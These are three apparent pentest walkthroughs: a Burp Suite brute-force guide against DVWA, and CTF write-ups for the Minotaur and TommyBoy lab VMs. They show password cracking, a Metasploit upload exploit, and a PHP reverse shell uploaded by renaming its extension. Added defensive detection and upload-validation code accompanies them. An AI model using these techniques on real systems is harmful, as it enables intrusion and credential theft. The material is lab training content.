Brute Force Website Login Page using Burpsuite (Beginner Guide)


Hello friends!! This is a beginner guide to brute force attacks using Burp Suite. In this article we demonstrate a login page brute force attack on the web application “DVWA”.

Table of Content
§  Introduction to Brute Force Attack
§  Vectors of Brute Force Attack
§  What is a wordlist or dictionary?
§  Lab Set-up Requirement
§  Password Brute Force Using Sniper Attack
§  Username & Password Brute Force Using Cluster Bomb Attack

Introduction to Brute Force Attack

Brute force plays a vital role in web penetration testing because it is the simplest method of gaining access to a site or server: it finds the correct username or password by trying every possible combination that could form a username or password.

For example: you have a 3-digit PIN for logging into an account, but when you forget the PIN you try different values until you find the right match and unlock the account.

Vectors of Brute Force Attack
§  Using default login credentials such as admin:admin or admin:password
§  Weak password or PIN such as 123
§  Birth date or name such as raj:1111

In common Internet security guidance, 8 characters is considered the standard minimum password length, because the number of guesses needed for a complex password of that length is much larger. For this reason there are many programs and scripts that reduce the manual effort of guessing a password or PIN by generating a wordlist or dictionary.

What is a wordlist or dictionary?

A wordlist or dictionary is a collection of words that is very useful when mounting a brute force attack. There are several tools that let you generate your own dictionary for use in a brute force attack.
Read the articles below to learn more about wordlist generating tools.


Lab Set-up Requirement
Target: DVWA (read from here)
Attacking tool: Burp Suite installed (any platform: Windows/Kali Linux)

Password Brute Force Using Sniper Attack
Burp Suite: Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.
Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun. Importantly, it gives us another way to manage our attacks, as an alternative to Metasploit.

§  To make Burp Suite work, first we have to turn on the browser's manual proxy. For that, go to the settings and choose Preferences.
§  Then select the Advanced option, go to Network and select Settings.
§  Now select Manual proxy configuration.



Now, on the other side, open DVWA and log into it using its default username and password. Once logged in, click on Brute Force. Also make sure that the security level is set to low or medium. When you click on Brute Force, it asks for a username and password to log in. Now suppose you don't know the password for the account.
To perform the brute force attack, first enter a random password and then intercept the browser request using Burp Suite, as explained in the next step.



Now open Burp Suite, select the Proxy tab and turn on interception by clicking the Intercept is on/off button.
Then go back to the DVWA Brute Force page and click the Login button.
As you can observe, we have successfully intercepted the browser request.



Send the captured data to Intruder by right-clicking in the request area and choosing Send to Intruder, or simply press Ctrl+I.
Then select the Positions tab and follow the steps below:
§  Choose the attack type Sniper.
§  Click the Clear button to deselect the selected areas.



Now select the password value as shown in the image below and then click the Add button.




In the above image we have selected the password, which means we need a dictionary file of passwords. I have already created a dictionary named password.txt, but you can create your own dictionary to suit your situation.
So now go to the Payloads tab and select 1 from Payload set (this ‘1’ denotes the password position). Then click the Load button, browse and select your password dictionary file.






Now all you have to do is go to the Intruder menu and select Start attack to launch the brute force attack.
Sit back and relax, because Burp Suite will now do its work, trying each password for the given username until it finds the correct one.
The moment it finds the correct value, that response will have a larger length, as shown:



Username & Password Brute Force Using Cluster Bomb Attack
In the above scenario you saw how easily we were able to guess the correct password when we knew the username. But what will you do when you don't know anything, neither username nor password?

So don't panic when facing such a scenario, because Burp Suite has many options for launching brute force attacks in various situations; “Cluster Bomb” is the attack type that helps us brute force the username and password fields simultaneously.

Now once again repeat the above steps to capture the browser request. This time enter random credentials, and do not forget to configure the Burp Suite settings before clicking the Login button.






As you can observe, we have successfully intercepted the browser request; now send the captured data to Intruder.


Then select the Positions tab and follow the steps below:
§  Choose the attack type “Cluster bomb”.
§  Click the Clear button to deselect the selected areas.
§  Then select the username and password values as shown in the image below and click the Add button.



In the previous situation we were brute forcing a single password field, so we uploaded one dictionary for guessing the correct password; this time we have selected two payload positions, so we have to upload two dictionaries, for the username and the password respectively.

Therefore set payload set 1 with Simple list as the payload type and upload the username wordlist.



And set payload set 2 with Simple list as the payload type and upload the password wordlist.



Now all you have to do is go to the Intruder menu and select Start attack to launch the brute force attack.
Sit back and relax, because Burp Suite will now do its work, trying every username and password combination until it finds the correct pair.
The moment it finds the correct values, that response will have a larger length, as shown:
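The response-length change that Intruder relies on is also the signal a defender can alert on. The following added example (not from the original article) parses constructed Apache access-log lines for a DVWA-style login page, flags a source address that exceeds a threshold of login attempts inside a sliding window, and reports any response size that breaks the uniform pattern of failed attempts; the log format and login path are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache "combined" log format (assumed); the sample lines below are constructed
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
LOGIN_PATH = "/vulnerabilities/brute/"   # DVWA brute-force page (assumed path)

def parse_line(line):
    """Return (ip, timestamp, path, status, response_size) or None if the line does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    size = 0 if m.group("size") == "-" else int(m.group("size"))
    return m.group("ip"), ts, m.group("path"), int(m.group("status")), size

def detect_bruteforce(lines, window_s=60, threshold=10):
    """Flag source IPs making >= threshold login attempts within window_s seconds.

    Returns {ip: {"attempts": total_login_requests, "odd_sizes": [...]}} where odd_sizes
    lists response sizes that differ from the burst's dominant size: the same "length
    changed" signal an attacker watches for in Intruder marks a probable success."""
    recent = defaultdict(deque)     # ip -> (timestamp, size) pairs inside the sliding window
    totals = defaultdict(int)
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, path, _status, size = rec
        if not (path.startswith(LOGIN_PATH) and "password=" in path):
            continue
        totals[ip] += 1
        window = recent[ip]
        window.append((ts, size))
        while (ts - window[0][0]).total_seconds() > window_s:
            window.popleft()
        if len(window) >= threshold:
            sizes = [s for _, s in window]
            dominant = max(set(sizes), key=sizes.count)
            alert = alerts.setdefault(ip, {"attempts": 0, "odd_sizes": set()})
            alert["odd_sizes"].update(s for s in sizes if s != dominant)
    for ip, alert in alerts.items():
        alert["attempts"] = totals[ip]
        alert["odd_sizes"] = sorted(alert["odd_sizes"])
    return alerts

def sample_log():
    """Constructed sample: 12 guesses in 24 s from one host, the last answered with a
    bigger page, plus one ordinary request from another host."""
    fmt = ('{ip} - - [10/Mar/2019:12:00:{sec:02d} +0000] "GET /vulnerabilities/brute/'
           '?username=admin&password=guess{n}&Login=Login HTTP/1.1" 200 {size} "-" "Mozilla/5.0"')
    lines = [fmt.format(ip="10.0.0.5", sec=2 * n, n=n, size=4500) for n in range(11)]
    lines.append(fmt.format(ip="10.0.0.5", sec=24, n=11, size=4612))
    lines.append(fmt.format(ip="10.0.0.9", sec=30, n=0, size=4500))
    return lines
```

A Cluster Bomb run multiplies the volume (every username times every password), so the per-source burst is even easier to spot than a Sniper run against one username.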



In this article we used Burp Suite for brute force on a web application, but there are many other well-known penetration testing tools that are useful for brute force attacks. You can follow the links below to read related articles.


HAppY HAckinG!!!

Hack the Minotaur VM (CTF Challenge)


Minotaur is a Boot2Root CTF challenge that helps us improve our skills, especially in password cracking. The VM will assign itself a specific IP address (in the 192.168.56.0/24 range). Do not change this, as the CTF will not work properly without an IP address in 192.168.56.0/24. Two things to keep in mind:
Hints
  1. This CTF has a couple of fairly heavy password cracking challenges, and some red herrings.
  2. One password you will need is not on rockyou.txt or any other wordlist you may have out there. So you need to think of a way to generate it yourself.
Penetration Methodology
§  Network scanning (Nmap)
§  WordPress scanning & password cracking (WPScan)
§  Generate a password dictionary (CeWL)
§  Reverse connection (Metasploit)
§  Download shadow.bak and crack the hashes (John)
§  Sudo rights privilege escalation
§  Get root access and capture the flag.
Let’s Start!!!
We will start off with nmap because we already have our target IP.
nmap -A 192.168.56.223




As a result of nmap we can see that ports 22, 80 and 2020 are open. We can use ports 22 and 80 to our advantage.
Next we tried to explore with nikto and curl, but unfortunately found nothing of use, so we decided to use DirBuster.
Go to the Kali terminal and type:
dirbuster
This opens DirBuster. In it, enter the URL in the Target URL box and select the directory-list-2.3-medium.txt file in the “File with list of dirs/files” box.




It shows a directory called /bull/, which we open in our browser.




It shows that there is a blog built with WordPress. As the blog runs on WordPress we can use WPScan to find usernames and vulnerable themes and plug-ins. To run WPScan type:
wpscan -u http://192.168.56.223/bull/ --enumerate u --enumerate p
The command will run and show you all the exploitable plug-ins along with usernames; from its result you will learn the following:
One user with the username bully. Also, there is a plug-in exploit for Slideshow Gallery.




But we require a username and password to make this exploit work. We already have the username; all we need is its password, and we have no idea where to find it, as we have no dictionary or password file. The hint we read earlier mentioned the need to generate our own wordlist. Therefore we will make a password file using CeWL. To make a password file with CeWL, go to the terminal of your Kali and type:
cewl http://192.168.56.223/bull -m 3 -w /root/Desktop/pass.txt
This creates a .txt file listing all the words that could possibly be the password for the user bully.




Now, to find its password, we will use Burp Suite. Apply a dictionary attack using Burp Suite; the moment it finds the correct password, the response length changes, as shown below:




Now that we know the username and password we can use the exploit for the plug-in. To do so, open Metasploit and type:
use exploit/unix/webapp/wp_slideshowgallery_upload
msf exploit(unix/webapp/wp_slideshowgallery_upload) > set rhost 192.168.56.223
msf exploit(unix/webapp/wp_slideshowgallery_upload) > set targeturi /bull/
msf exploit(unix/webapp/wp_slideshowgallery_upload) > set wp_user bully
msf exploit(unix/webapp/wp_slideshowgallery_upload) > set wp_password Bighornedbulls
msf exploit(unix/webapp/wp_slideshowgallery_upload) > exploit
As the exploit runs it will give you a Meterpreter session.




After digging further we found a flag.txt file and shadow.bak inside the /tmp directory.
cd /tmp
ls
cat flag.txt




We also got a hint that the shadow.bak file could be useful to us. Let's have a look at it.
cat shadow.bak




Let's download it with the help of the following command:
download shadow.bak /root/Desktop




We will take the help of the John password cracker to find the passwords:
john shadow.bak




We found the passwords for both heffer and minotaur. Recall that port 22, i.e. SSH, was open, so we can use it to log in. For this, type:
ssh heffer@192.168.56.223
Give the password when asked and then check the directories:
ls -lsa
We found a flag here. Read it.
cat flag.txt



In this flag we found another hint, indicating that the next user is minotaur. Now we will log in through SSH as minotaur:
ssh minotaur@192.168.56.223
Give the password when asked. Then check the directories:
ls -lsa
There is another flag available. Again, read it.
cat flag.txt



Now we have found this flag along with another hint: the final flag is in /root/flag.txt. Let's check the sudo rights for the user minotaur.
sudo -l
As you can observe, minotaur has ALL privileges, so let's move on: type the following to gain root access and switch user:
sudo su
Finally we have found the last flag.
cat /root/flag.txt
WOOHOO!!! The flag is captured. Congrats and enjoy!!


Hack the TommyBoy VM (CTF Challenge)

Tommy Boy VM is a CTF based on the movie Tommy Boy and the fictitious company “Callahan Auto” in the movie. This CTF, Tommy Boy, has been created by Brian Johnson of 7 Minute Security. It is a really fun VM — a few bits of it were fairly easy, some parts of it were really tricky, and there are some pretty neat little tricks in there too.
Note from the author:
The primary objective is to restore a backup copy of the homepage to Callahan Auto’s server. However, to consider the box fully pwned, you’ll need to collect 5 flags strewn about the system, and use the data inside them to unlock one final message.
WalkThrough
Let’s start off with scanning the network to find our target.


We found our target –> 192.168.1.108
Our next step is to scan our target with Nmap. We will run an aggressive scan as it is quick.
nmap -A 192.168.1.108


The result shows us that there are 3 open ports: 22 (ssh), 80 (http), 8008 (http).
To explore further and find the flags we browsed the URL on port 80 and were greeted with the Callahan Auto page, which apparently was experiencing some technical difficulties.


Let's use the nikto tool to get detailed information about our target. For this, type the following:


Using nikto we found that there is a text file named robots.txt which might contain some useful information. We can either open it in our browser or list its contents via curl as shown below. And yes, we found our first flag.
curl http://192.168.1.108/robots.txt


Hurrah!! We got our first flag: B34rcl4ws
I took a look at the main page again to see if there was anything of interest in the page source, and found a YouTube link.
Running curl gives the same result as view-source, and there too is the YouTube link. There seems to be no harm in opening it, so let's do that and see whether it holds any significant information.


On opening the YouTube link, we can infer that it has something to do with a prehistoric forest. So we tried that in the browser as –> 192.168.1.108/prehistoricforest/



And to our luck we found a lot of information. The first thing we learned was that the website was built with WordPress.



As we found another important clue on the same prehistoric forest web page, we decided to investigate further. This decision proved right, as we found another clue which said to use /richard instead of /prehistoricforest.
Let's browse http://192.168.1.108/richard/




This image, as it is, gave us no clue. So we decided to open it with ExifTool.


Go to www.md5cracker.org OR http://www.hashkiller.co.uk/ and crack the MD5 hash we just discovered. On cracking it we find that it is the word spanky.


Output of cracked MD5 hash :
ce154b5a8e59c89732bc25d6a2e6b90b   spanky

Investigating the same “prehistoricforest” page further, we found other important things, like the text file which contained our second flag.





Hurrah!! We got our 2nd flag: Z4l1nsky
If we navigate further to the URL http://192.168.1.108/prehistoricforest and go to a password-protected blog post, it prompts for a password. Let's try the password spanky. Hey, we are in!!


We are able to read the blog now, which contains loads of information with hidden hints. Go through the full page and note down the things to remember.
Going through the page, we noted 2 things (refer to the screenshot below) which could be the way forward. We will use these clues one by one.
1. There is something about nickburns
2. There is an FTP service running on a non-standard port. Also, the FTP server goes up and down at a regular interval of 15 minutes.




Now let's try to find whether the FTP port is open as per the clue in the blog. We scanned the ports before and did not find an FTP port anywhere, so let us scan every port.
Note: The FTP server was running on a non-standard port and goes on/off every 15 minutes.
nmap -p- -sV 192.168.1.108 --open


We guessed that he may have reused his username as his password and tried nickburns:nickburns,
and it was successful!
ftp 192.168.1.108 65534
Looking at the readme file, we were presented with some additional clues.
cat readme.txt


In the file you will see that he talks about a subfolder “NickIzL33t”. I tried this subdirectory on port 80 without success, so I tried again on port 8008.
First let's access http://192.168.1.108:8008/ and see what is in store for us.

Now if we pay attention, it says “only me and Steve Jobs are allowed to look at this stuff”, which means we can read the content with an iPhone user agent. There is a Firefox add-on named “User Agent Switcher” that allows us to read the said page.
When you have added this add-on, go to the Tools menu; a drop-down menu will appear. Select Default User Agent and from it select the iPhone 3.0 option.




He also talks about a certain .html file. We have already checked everywhere and didn't find such a file. It's possible this file is hidden, so let's use DirBuster or dirb to find it.
Note: Running the command below takes a lot of memory, so it is recommended to increase the RAM of your system enough to run it.
dirb http://192.168.1.108:8008/NickIzL33t/ /usr/share/wordlists/rockyou.txt -a "Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25" -X .html
Finally, after a long wait, we got the html file: fallon1.html
Browsing the URL http://192.168.1.108:8008/NickIzL33t/fallon1.html, we got a lot of information.


Hurrah!! We got our 3rd flag: TinyHead

Additionally, download the zip file t0msp4ssw0rdz.zip


Also, let's click on “A hint” and we get redirected to http://192.168.1.108:8008/NickIzL33t/hint.txt, where we find hints about the passwords.


We need to figure out how to create a custom dictionary using the clues Nick has given us. It starts with ‘bev’, then 1 uppercase char, 2 numbers, 2 lowercase chars, one symbol and then 1995:
bev[A-Z][1–9][1–9][a-z][a-z][symbol]1995
Let’s use crunch utility to create a dictionary with the following command:
crunch 13 13 -t bev,%%@@^1995 -o /root/Desktop/dict.txt


Now we have our custom dictionary built from the clues. Let's use it to brute force Big Tom's password file with the help of the fcrackzip tool.
cd Downloads/
fcrackzip -u -D -p /root/Desktop/dict.txt t0msp4ssw0rdz.zip
Password = bevH00tr$1995
Unzip the file using the password extracted in the above step:
unzip t0msp4ssw0rdz.zip
Here we get a file passwords.txt; reading it gives us some usernames and credentials.
cat passwords.txt
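To see why a structure hint shrinks the search this much, the following added example (not from the original walkthrough) interprets a crunch -t mask with crunch's placeholder rules, counts the candidates it produces, compares that with an unconstrained password of the same length, and checks a candidate against the mask. The symbol set for ^ is assumed to be crunch's default; adjust CHARSETS if your build differs.

```python
import re
import string

# crunch -t placeholders: @ lowercase, , uppercase, % digits, ^ symbols; any other
# character is a literal. The symbol set here is assumed to be crunch's default.
CHARSETS = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": "!@#$%^&*()-_+=~`[]{}|\\:;\"'<>,.?/ ",
}

TOM_MASK = "bev,%%@@^1995"   # the mask built from Nick's hint in the walkthrough

def mask_keyspace(mask):
    """Number of candidates crunch writes for this -t mask (a literal contributes 1)."""
    count = 1
    for ch in mask:
        count *= len(CHARSETS.get(ch, ch))
    return count

def mask_regex(mask):
    """Translate the mask into an anchored regex so candidates can be checked against it."""
    parts = []
    for ch in mask:
        charset = CHARSETS.get(ch)
        parts.append("[" + re.escape(charset) + "]" if charset else re.escape(ch))
    return re.compile("^" + "".join(parts) + "$")

def matches_mask(candidate, mask):
    """True if the candidate is one of the strings the mask would generate."""
    return mask_regex(mask).match(candidate) is not None

def full_keyspace(length, alphabet=95):
    """Candidates for an unconstrained password of the same length over printable ASCII."""
    return alphabet ** length

def search_reduction(mask, alphabet=95):
    """How many times smaller the structured search is than the unconstrained one."""
    return full_keyspace(len(mask), alphabet) // mask_keyspace(mask)
```

The lesson for the defender is that a password "hint" describing the composition of the secret is as good as leaking most of it: the 13-character search collapses from 95^13 candidates to a few tens of millions.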


Here we need to identify the full password of the Callahan Auto server, as it is clearly mentioned that after the “fatguyinalittlecoat” part there are some numbers; however, the admin doesn't remember them.
Username: bigtommysenior
Password: fatguyinalittlecoat  

Let's perform a WordPress scan and enumerate the users:
wpscan -u http://192.168.1.108/prehistoricforest/ --enumerate u


wpscan -u http://192.168.1.108/prehistoricforest/ --wordlist=/usr/share/wordlists/rockyou.txt --username tom
The password for user ‘tom’ is ‘tomtom1’.
I tried finding the credentials for user tommy; it ran for quite a long time and finally I abandoned it.


Now let's log in to the WordPress site http://192.168.1.108/prehistoricforest/wp-admin as user ‘tom’ with the above credentials. Once logged in, we find a post in the “Drafts” folder of the dashboard: my-ess-ess-eight-password.
This also gives us a clue (read my-ess-ess-eight-password as “SSH password”) that there is something on the SSH port we may need to look at next!!


So now we will try to log in over SSH as the user bigtommysenior with the following credentials:
Username: bigtommysenior
Password: fatguyinalittlecoat1938!!

To see the list of files and folders type:
ls -la
Here we see a file el-flag-numero-quatro.txt which could be of interest. Let's open it:
cat el-flag-numero-quatro.txt
The contents of the file contain the flag data!


Hurrah!! We got our 4th flag: EditButton
In addition we got a clue for the 5th flag as well (i.e. the name of the file, /5.txt)
1. Restoration of the website
Before we go to the last flag, we need to restore the backup first. As seen in the above screenshot there is a callahanbak.bak file, which seems to be a backup. Let's copy this file to the /var/www/html directory as follows:
cp callahanbak.bak /var/www/html/index.html


Now try browsing the company website http://192.168.1.108/index.html. As a result of restoring the backup, we can see that the website is back to normal.


2. Capture the last flag
(a) Exploring further and viewing the source of http://192.168.1.108:8008/NickIzL33t/fallon1.html, we found a clue for a particular folder, P4TCH_4D4MS. Let's append this as a sub-directory to the URL http://192.168.1.108:8008/NickIzL33t/


Browse the URL http://192.168.1.108:8008/NickIzL33t/P4TCH_4D4MS/. It gives an option to upload an image file. This is a clue that we can upload our reverse shell here.


We already have a php-reverse-shell.php file under /usr/share/webshells/php on Kali Linux. Let's edit the php-reverse-shell.php file and set the Kali IP as follows ($ip = ‘192.168.1.107’)


While trying to upload the PHP file (with the .php extension), we were unable to upload it and were greeted with an error saying only image (JPEG, PNG, GIF) files are allowed.

This means there is a file extension restriction/filter in place. Let's try renaming the file extension to .png and see if it works. Yes, on uploading again we observed that the file php-reverse-shell.png was uploaded successfully.


(b) We now need to go to the uploads folder and change the extension back to its original (i.e. from .png back to .php). Before that we need to find out exactly where the uploads folder is.
After some navigation and research we found that the following path contains the uploads folder, which has the php-reverse-shell.png file we uploaded earlier.
cd /var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/

ls

Here we can see the uploads directory, which might contain some interesting files:
cd uploads/
ls
The output lists the file php-reverse-shell.png (uploaded in the earlier step) under the uploads directory.

Now rename the file php-reverse-shell.png to php-reverse-shell.php as shown below:

mv php-reverse-shell.png php-reverse-shell.php
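From the defender's side, the filter defeated here trusted only the client-supplied extension. The following added example (not the target's code, nor from the original walkthrough) shows that weak check next to a stricter one that verifies the file's leading bytes, makes extension and content agree, and stores the file under a server-chosen name; the sample inputs are constructed.

```python
import os
import secrets
import tempfile

# Leading bytes of the three image types the upload form says it accepts
MAGIC = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
ALLOWED_EXT = {"jpg": "jpg", "jpeg": "jpg", "png": "png", "gif": "gif"}

def extension_of(filename):
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""

def weak_check(filename):
    """The style of filter the walkthrough gets past: the user-chosen extension is all it sees."""
    return extension_of(filename) in ALLOWED_EXT

def image_kind(data):
    """Identify the image type from its leading bytes, or None if it is not one of the three."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None

def strict_check(filename, data):
    """Accept only if the extension is allowed, the bytes are a real image, and the two agree."""
    kind = image_kind(data)
    if kind is None or ALLOWED_EXT.get(extension_of(filename)) != kind:
        return None
    if b"<?" in data:     # cheap extra layer against image/PHP polyglots; not a substitute
        return None       # for serving the upload directory with script execution disabled
    return kind

def store_upload(filename, data, upload_dir):
    """Store under a server-chosen random name whose extension comes from the content,
    never from the client, so the client cannot pick a .php name. Returns the stored name."""
    kind = strict_check(filename, data)
    if kind is None:
        raise ValueError("only JPEG, PNG or GIF image files are allowed")
    stored = secrets.token_hex(16) + "." + kind
    with open(os.path.join(upload_dir, stored), "wb") as fh:
        fh.write(data)
    return stored

# Constructed samples: a stand-in for a PHP file renamed to .png, and a minimal PNG header
FAKE_PHP_AS_PNG = b"<?php echo 'constructed stand-in, not a shell'; ?>"
TINY_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

def demo():
    """Run both checks on both samples and store the real image in a temporary directory."""
    tmp = tempfile.mkdtemp()
    stored = store_upload("cat.png", TINY_PNG, tmp)
    return {
        "weak_accepts_renamed_php": weak_check("php-reverse-shell.png"),
        "strict_accepts_renamed_php": strict_check("php-reverse-shell.png", FAKE_PHP_AS_PNG),
        "strict_accepts_png": strict_check("cat.png", TINY_PNG),
        "stored_ext": stored.rsplit(".", 1)[-1],
        "stored_exists": os.path.exists(os.path.join(tmp, stored)),
    }
```

The rename-on-disk step that follows in the walkthrough only works because the upload directory sits under a web root that executes PHP; a content check plus a non-executable upload location closes both halves of the chain.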


Let's run a Netcat listener:
nc -lvp 1234
Browse the following URL and we get limited shell access:
http://192.168.1.108:8008/NickIzL33t/P4TCH_4D4MS/uploads/php-reverse-shell.php
Now let's list the contents and we see that a .5.txt file is listed here:
ls -la
cat .5.txt


Voila!! We got our 5th flag: Buttcrack
As we have captured all five flags, let's concatenate them into one long string, which may eventually help us open the zip file.
String: B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack
So now unzip the zip file:
unzip LOOT.zip
It prompts for the unzip password; type the long string above as the password. Once the file is unzipped it contains the last part of the challenge, i.e. a text file. Let's read it and finish this whole thing up:
cat THE-END.txt